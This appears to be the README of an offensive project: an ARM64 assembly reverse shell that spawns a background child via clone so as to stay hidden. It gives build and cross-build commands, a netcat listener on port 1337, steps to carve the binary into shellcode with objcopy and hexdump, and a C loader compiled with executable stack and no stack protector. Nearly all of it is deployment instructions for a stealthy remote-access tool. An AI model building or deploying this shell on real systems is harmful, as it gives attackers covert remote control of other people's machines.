A small, stealthy, ARM64 reverse shell that utilizes clone
, similar to fork
, in order to spawn a child process and run in the background. Ultimately to look less suspicious.
as arm-revshell.s -o arm-revshell+clone.o && ld -N arm-revshell+clone.o -o arm-revshell
nc -lnvp 1337
Then, run ./arm-revshell+clone
to execute.
aarch-linux-gnu-as arm-revshell+clone.s -o arm-revshell+clone.o && aarch-linux-gnu-ld -N arm-revshell+clone.o -o arm-revshell+clone
nc -lnvp 1337
Then, run qemu-aarch64 ./arm-revshell+clone
to execute.`
This is to show you that we can achieve the same cyber result, just in a different executable format. It also goes to show how easily it is to "fit" shellcode into places.
First, we must use objcopy
to save the binary object to a .bin
file so we can convert it into an easily copiable format:
objcopy -O binary arm-revshell+clone arm-revshell+clone.bin
Then, we need to utilize hexdump
to "carve" out the shellcode from the binary object:
hexdump -v -e '"\\""x" 1/1 "%02x" ""' arm-revshell+clone.bin > shellcode.txt
Lastly, we need to copy the contents of shellcode.txt
into the shellcode[]
buffer, within the shellcode-exec.c
file.
gcc shellcode-exec.c -o shellcode-exec -z execstack -fno-stack-protector
We can now easily call our shellcode within a C program.
Start a Netcat Listener:
nc -lnvp 1337
Execute the program:
./shellcode-exec
CONGRATS, SHELLCODE EXECUTED! ENJOY!